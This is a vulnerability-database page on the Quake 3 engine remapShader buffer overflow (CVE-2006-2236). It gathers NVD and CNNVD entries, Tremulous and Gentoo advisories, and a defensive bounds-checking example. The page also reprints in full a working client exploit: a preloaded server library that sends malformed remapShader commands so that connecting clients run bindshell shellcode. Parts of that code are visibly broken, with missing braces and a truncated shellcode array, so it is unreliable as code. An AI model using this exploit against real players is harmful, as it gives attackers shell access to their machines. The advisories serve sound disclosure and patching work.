Published: 2006-05-08 19:02:00
Last revised: 2017-10-18 21:29:07

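[Original] Buffer overflow in the Quake 3 Engine, as used by (1) ET 2.60, (2) Return to Castle Wolfenstein 1.41, and (3) Quake III Arena 1.32b allows remote attackers to execute arbitrary commands via a long remapShader command.

[CNNVD] Quake 3 Engine remapShader command remote buffer overflow vulnerability (CNNVD-200605-117)

        The Quake 3 Engine is a game engine developed by id Software and used by many games.
        The Quake 3 Engine has a buffer overflow vulnerability in its handling of command requests: sending specially crafted arguments to the engine's remapShader command triggers a buffer overflow, leading to arbitrary code execution or denial of service.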

- CVSS (base score)

CVSS score: 7.6 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(UNKNOWN)  BUGTRAQ  20060508 Two independent vulnerabilities (client and server side) in Quake3 engine and many derived games
(UNKNOWN)  BID  17857
(UNKNOWN)  VUPEN  ADV-2006-1676
(UNKNOWN)  XF  quake3-remapshader-client-bo(26264)

- Vulnerability information

Quake 3 Engine remapShader command remote buffer overflow vulnerability
High risk, buffer overflow
2006-05-08 00:00:00 2006-05-09 00:00:00

- Advisories and patches


- Vulnerability information (1750)

Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit (EDBID:1750)
linux remote
2006-05-05 Verified
0 landser
N/A
// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit
// by landser - landser at
// this code works as a preloaded shared library on a game server,
// it hooks two functions on the running server:
// svc_directconnect() that is called when a client connects,
// and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients.
// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message.
// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro)
// (win32 clients are vuln too but not included here)
// usage:
// gcc remap_this.c -shared -fPIC -o
// and run a server with env LD_PRELOAD="./"
// -----------------------------------------------------
// [luser@box ~/wolfenstein]$ LD_PRELOAD="./" ./wolfded.x86 +set net_port 5678 +map mp_beach
// remap_this.c by landser - landser at
// game: RtCW 1.41 Dedicated.
// [...]
// directconnect(): connected
// sendservercommand() called
// sendservercommand() called
// sendservercommand() called
// [...]
// [luser@box ~/wolfenstein]$ nc 27670 -vv
// sus4 [] 27670 (?) open
// id
// uid=1000(luser) gid=100(lusers)
// -----------------------------------------------------
// visit for open source linux cheats

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <dlfcn.h>
#include <sys/mman.h>

#define SILENT // hide the crappy server output
#define PORT 27670 // bindshell port. some values are invalid

struct netaddr { // from q3-1.32b/qcommon/qcommon.h
	int type;
	unsigned char ip[4];
	unsigned char ipx[10];
	unsigned short port;

struct {
	char *name;
	char *fn;
	unsigned long retaddr;	// something that jumps to %esp
	unsigned long sendservercommand; // address of sv_sendservercommand()
	unsigned long directconnect; // address of svc_directconnect()
	int hooklen; // for both sendservercommand and directconnect
	unsigned long errormsg; // address of error string
	unsigned long comerror; // address of com_error()
	int popas; // num of popa instructions before shellcode
	int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction
} games[] = {
	{"ET 2.60 Dedicated",		"etded",
		0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12},
	{"RtCW 1.41 Dedicated",		"wolfded",
		0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12},
	{"Quake 3 1.32b Dedicated",	"q3ded",
		0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27},

const int ngames = sizeof(games) / sizeof(games[0]);
const unsigned short int port = PORT;

static void *hook (void *, int, void *);
static void sendservercommand (void *, const char *, ...);
static void directconnect (struct netaddr);
static void writebuf (void);

void (*_sendservercommand)(void *, const char *, ...);
void (*_directconnect)(struct netaddr);

int c = -1;
unsigned char buf[1024];

// shellcode (286 bytes):
// fork()s,
// the parent proc calls com_error() with an error message (errormsg var),
// the child proc binds a shell on a chosen port
// unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80
unsigned char sc[] =
	"\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01"
	"\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM"

void __attribute__ ((constructor)) init (void) {
	char buf[256];
	int ret;
	printf("remap_this.c by landser - landser at\n\n");

	ret = readlink("/proc/self/exe", buf, sizeof buf);
	if (ret < 0) {
	buf[ret] = '\0';

	for (c=0;c<ngames;c++)
		if (strstr(buf, games[c].fn)) break;
	if (c == ngames) {
		printf("binary doesnt match any of the targets.\n");
	printf("game: %s.\n\n", games[c].name);


	_sendservercommand = hook((void *)games[c].sendservercommand, games[c].hooklen, &sendservercommand);
	_directconnect = hook((void *)games[c].directconnect, games[c].hooklen, &directconnect);

int fputs (const char *s, FILE *fp) {
	static int (*_fputs)(const char *, void *);
	if (!_fputs) _fputs = dlsym(RTLD_NEXT, "fputs");

#ifdef SILENT
	if (strncmp(s, "---", 3)) return 1;

	return _fputs(s, fp);

static void sendservercommand (void *client, const char *fmt, ...) {
	printf("sendservercommand() called\n");
	_sendservercommand(client, "%s", buf);

static void directconnect (struct netaddr addr) {
	printf("directconnect(): %d.%d.%d.%d connected\n",
		addr.ip[0], addr.ip[1], addr.ip[2], addr.ip[3]);

static void writebuf (void) {
	unsigned char *cm1, *cm2, *ptr = buf;
	int i, b;

	strcpy(ptr, "remapShader ");
	if (strstr(games[c].name, "Quake")) strcat(ptr, "j w ");
	strcat(ptr, "\"");
	ptr += strlen(ptr);

	memset(ptr, '\b', 76);
	ptr += 76;

	memcpy(ptr, &games[c].retaddr, 4);
	ptr += 4;

	if (strstr(games[c].name, "Quake")) {
		// replaces %ebp with %esp without using the stack
		memcpy(ptr, "\x33\x2f\x31\x2f\x31\x27\x33\x27\x31\x27", 10);
		ptr += 10;

	memset(ptr, 0x61, games[c].popas); // 'popa' instructions
	ptr += games[c].popas;

	memcpy(ptr, sc, sizeof(sc));
	memset(ptr + strlen(ptr) - 3, games[c].gap, 1);
	memset(ptr + strlen(ptr) - 1, games[c].gap - 2, 1);

	cm1 = strstr(ptr, "CM1");
	cm2 = strstr(ptr, "CM2");
	if (!cm1 || !cm2) abort();
	for (i=0;i<3;i++) {
		b = (games[c].comerror >> (8*i)) & 0xff;
		if ((b-1) >= 0x7f) {
			cm1[i] = 0x6b;
			cm2[i] = b - 0x6b;
		else {
			cm1[i] = b - 1;
			cm2[i] = 1;

	ptr = strstr(ptr, "PORT");
	if (!ptr) abort();
	memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32
	memcpy(ptr+2, &port, sizeof port);
	ptr = strstr(ptr, "ERRM");
	if (!ptr) abort();
	memcpy(ptr, &games[c].errormsg, 4);

	strcat(ptr, "\"");
	if (!strstr(games[c].name, "Quake")) strcat(ptr, " j w");

#define PAGE(x) (void *)((unsigned long)x & 0xfffff000)

static void *hook (void *hfunc, int len, void *wfunc) {
        void *newmem = malloc(len+5);
	long rel32;

	// copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it
        memcpy(newmem, hfunc, len);
	memset(newmem+len, 0xe9, 1); // e9 - jmp rel32
	rel32 = hfunc - (newmem+5);
	memcpy(newmem+len+1, &rel32, sizeof rel32);

	// make 'hfunc's address writable & executable
	mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
	// change the start of 'hfunc' to a 'jmp *wfunc' instruction
	memset(hfunc, 0xe9, 1); // e9 - jmp rel32
        rel32 = wfunc - (hfunc+5);
	memcpy(hfunc+1, &rel32, sizeof rel32);

        return newmem;

// [2006-05-05]

- Vulnerability information (F110095)

Tremulous Inherited Issues (PacketStormID:F110095)
2012-02-23 00:00:00
Simon McVittie  

Tremulous, a team based FPS game with RTS elements, suffers from a large amount of old Quake related vulnerabilities.


Tremulous is a team-based FPS game with RTS elements. Its engine and
game logic are based on the GPL source release of the Quake III Arena
engine and game logic by id Software.

The de facto upstream developer of the Quake III engine is now another
fork, ioquake3; in particular, ioquake3 fixes many security
vulnerabilities present in the original Quake III Arena source release.
Unlike (for instance) OpenArena or Urban Terror, Tremulous has diverged
from the original Quake III Arena engine, so it cannot be played using
an unmodified ioquake3 engine.

The Tremulous website advertises two versions of the game:

* 1.1.0, a stable release (released 2006-03-31). This is packaged
  in Debian/Ubuntu stable releases, and also appears to be packaged
  in FreeBSD, openSUSE and Gentoo.

* GPP1 ("Gameplay Preview 1"), a preview release (2009-12-03) of
  what will eventually become Tremulous 1.2. This
  appears to be packaged in Fedora stable releases.

In addition, there are several unofficial engine updates compatible with
1.1.0, notably a backport by Tony White (TJW), and a set of updated
client and server provided by Mercenaries' Guild. These are not
publicized by the main Tremulous website, but they are apparently
popular with players, and their functionality has been incorporated into
version 1.2 development.


Numerous security vulnerabilities have been reported and fixed in
ioquake3 since its initial release. Neither Tremulous 1.1.0 nor GPP1
incorporates fixes for all of these vulnerabilities.

I believe this table is more or less accurate, but I have only checked
Tremulous 1.1.0 in detail. If you ship one of the other versions, you
will need to do your own checks.

               Trem-1.1.0    MGC-1.011    MGS-1.01     tjw    Trem-GPP1
CVE-2001-1289       OK           OK           OK        OK       OK
CVE-2005-0430       OK           OK           OK        OK       OK
CVE-2005-0983       OK           OK           OK        OK       OK
CVE-2006-2082       Vuln         n/a          ?         Vuln     OK
CVE-2006-2236       Vuln         OK           n/a       OK       OK
CVE-2006-2875       Vuln         OK           n/a       OK       OK
CVE-2006-3324       Vuln         OK           n/a       Vuln     OK
CVE-2006-3325       Vuln         OK           n/a       Vuln     OK
CVE-2006-3400       OK           OK           OK        OK       OK
CVE-2006-3401       OK           OK           OK        OK       OK
CVE-2011-1412       OK           OK           OK        OK       OK
CVE-2011-2674       Vuln         Vuln         n/a       Vuln     Vuln
CVE-2011-3012       Vuln         OK           n/a       Vuln     OK

(For completeness, the table lists all CVE IDs I've found listed for
either Quake III Arena or ioquake3.)

Key: Trem-1.1.0 = Tremulous 1.1.0 (2006-03-31)
     MGC-1.011 = MercenariesGuild client 1.011 when used as a client
     MGS-1.01 = MercenariesGuild server 1.01 when used as a server
     tjw =
     Trem-GPP1 = Tremulous Gameplay Preview 1 (1.2 prerelease,

     Vuln = vulnerable
     partial = partial fix, probably still vulnerable
     n/a = server-specific bug not applicable to client or vice versa

In addition, searching ioquake3 commit history reveals a number of
commits which do not appear to be related to a CVE number, but could be
security-sensitive. I have not analyzed which of these could affect the
Tremulous engine. If you cause a new CVE number to be assigned for any
changes made to ioquake3 in the past (as was done for CVE-2011-3012),
please include a prominent reference to the relevant svn revision in any
advisory, so that CVE numbers can be correlated with the changes required.

Finally, to the best of my knowledge, ioquake3 upstream do not consider
the QVM bytecode interpreter to be safe for use with untrusted bytecode;
this means that auto-downloading (cl_allowDownload 1) is not considered
to be safe under any circumstances. This is particularly the case for
engines which do not have the interpreter/JIT hardening work that was
done in ioquake3 at svn revisions around 1687, 1717 and 2000, none of
which is present in at least Tremulous 1.1.0.


I have not received any response from Tremulous developers since I
contacted them privately 1 month ago.

Distributions like Debian, Fedora and Ubuntu should either fix the open
vulnerabilities, or remove affected Tremulous versions from their
repositories entirely.

I have uploaded tremulous 1.1.0-7 to Debian, with backports of the
various CVE fixes from ioquake3, and some additional pre-emptive changes
for potential bugs which are not known to be exploitable (avoiding
non-constant format strings and sprintf() into a fixed-length buffer).
Patches which I believe to be correct are available at
or by cloning the git repository
<git://>. Please contact me
via the Debian bug tracking system or the Games Team mailing list
<> with testing results or
corrections for these patches.

I believe that long-term-supported distributions should also mitigate
any future vulnerabilities in the ioquake3 bytecode interpreter by
removing client-side support for auto-downloading (always behaving as if
configured with cl_allowDownload 0) in their stable releases. I have
made this change in Debian's tremulous 1.1.0-7 package, but not yet in
Debian's ioquake3 package.


- Vulnerability information (F73735)

Gentoo Linux Security Advisory 200901-6 (PacketStormID:F73735)
2009-01-12 00:00:00

Gentoo Linux Security Advisory GLSA 200901-06 - A buffer overflow vulnerability has been discovered in Tremulous. It has been reported that Tremulous includes a vulnerable version of the ioQuake3 engine (GLSA 200605-12, CVE-2006-2236). Versions less than 1.1.0-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200901-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

     Severity: Normal
        Title: Tremulous: User-assisted execution of arbitrary code
         Date: January 11, 2009
         Bugs: #222119
           ID: 200901-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


A buffer overflow vulnerability has been discovered in Tremulous.


Tremulous is a team-based First Person Shooter game.

Affected packages

        Package                  /  Vulnerable  /              Unaffected
     1  games-fps/tremulous         < 1.1.0-r2                >= 1.1.0-r2
     2  games-fps/tremulous-bin       < 1.1.0                 Vulnerable!
        NOTE: Certain packages are still vulnerable. Users should migrate
              to another package if one is available or wait for the
              existing packages to be marked stable by their
              architecture maintainers.
        2 affected packages on all of their supported architectures.


It has been reported that Tremulous includes a vulnerable version of
the ioQuake3 engine (GLSA 200605-12, CVE-2006-2236).


A remote attacker could entice a user to connect to a malicious games
server, possibly resulting in the execution of arbitrary code with the
privileges of the user running the application.


There is no known workaround at this time.


Tremulous users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=games-fps/tremulous-1.1.0-r2"

Note: The binary version of Tremulous has been removed from the Portage


     [ 1 ] CVE-2006-2236
     [ 2 ] GLSA 200605-12


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:


Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to or alternatively, you may file a bug at


Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.


- Vulnerability information

Quake 3 Engine remapShader Command Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in the Quake 3 Engine. The Quake 3 Engine fails to perform proper bounds checking of the 'remapShader' command resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2006-05-05 Unknown
2006-05-05 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

- Vulnerability information

Quake 3 Engine remapShader Command Remote Buffer Overflow Vulnerability
Boundary Condition Error 17857
Yes No
2006-05-05 12:00:00 2010-05-17 06:52:00
Discovery is credited to landser.

- Affected software versions

Red Hat Fedora 13
Red Hat Fedora 12
id Software Wolfenstein: Enemy Territory 2.60
id Software Return to Castle Wolfenstein 1.41
id Software Quake 3 Engine 1.32 b
id Software Quake 3 Arena 1.32 b
Gentoo Linux
id Software Wolfenstein: Enemy Territory 2.60b
id Software Return to Castle Wolfenstein 1.41b
id Software Quake 3 Arena 1.32c

- Unaffected software versions

id Software Wolfenstein: Enemy Territory 2.60b
id Software Return to Castle Wolfenstein 1.41b
id Software Quake 3 Arena 1.32c

- Vulnerability discussion

The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of affected game clients. Failed exploit attempts will likely crash affected clients.

This vulnerability reportedly affects the following games:
- Quake 3 Arena
- Return to Castle Wolfenstein
- Wolfenstein: Enemy Territory

Other games may also be affected.
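
The missing bounds check described above, as an added example (not the engine's code and not id Software's patch): a receiver that length-checks every remapShader argument before copying it into a fixed-size buffer. The 64-byte NAME_BUF is an assumption modelled on the engine's MAX_QPATH, the three-argument form follows the command layout shown elsewhere on this page, and parse_remap, next_token and accepts_arg_of_length are hypothetical names.

```c
#include <stddef.h>
#include <string.h>

#define NAME_BUF 64  /* assumed fixed buffer size, modelled on the engine's MAX_QPATH */
struct remap_args { char name[3][NAME_BUF]; };

/* Find the next token (bare word or "quoted string") at *p.
   Returns its length, -1 at end of input, -2 on an unterminated quote. */
static long next_token(const char **p, const char **tok)
{
    const char *s = *p, *end;
    while (*s == ' ') s++;
    if (*s == '\0') return -1;
    if (*s == '"') {
        end = strchr(++s, '"');
        if (!end) return -2;
        *p = end + 1;
    } else {
        end = s + strcspn(s, " ");
        *p = end;
    }
    *tok = s;
    return (long)(end - s);
}

/* Parse: remapShader <arg> <arg> <arg>. Each argument is length-checked
   before it is copied. Returns 0 on success, -1 if the command is rejected. */
int parse_remap(const char *cmd, struct remap_args *out)
{
    const char *p = cmd, *tok = NULL;
    long len = next_token(&p, &tok);
    if (len != 11 || memcmp(tok, "remapShader", 11) != 0) return -1;
    for (int i = 0; i < 3; i++) {
        len = next_token(&p, &tok);
        if (len < 0 || len >= NAME_BUF) return -1; /* missing, malformed or too long */
        memcpy(out->name[i], tok, (size_t)len);
        out->name[i][len] = '\0';
    }
    return next_token(&p, &tok) == -1 ? 0 : -1;  /* reject trailing arguments */
}

/* Constructed input: a command whose first argument is n bytes of 'A'. */
int accepts_arg_of_length(size_t n)
{
    static char cmd[512];
    struct remap_args out;
    if (n > 400) return 0;
    strcpy(cmd, "remapShader \"");
    memset(cmd + 13, 'A', n);
    strcpy(cmd + 13 + n, "\" j w");
    return parse_remap(cmd, &out) == 0;
}

int main(void) { return accepts_arg_of_length(63) && !accepts_arg_of_length(64) ? 0 : 1; }
```

The boundary sits at NAME_BUF - 1: a 63-byte argument still fits with its terminator, while a 64-byte one is rejected before any copy takes place.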

- Exploit

The following exploit is available:

- Solution

id Software has released patches. Please see references for details.

id Software Quake 3 Arena 1.32 b

id Software Return to Castle Wolfenstein 1.41

id Software Wolfenstein: Enemy Territory 2.60

- Related references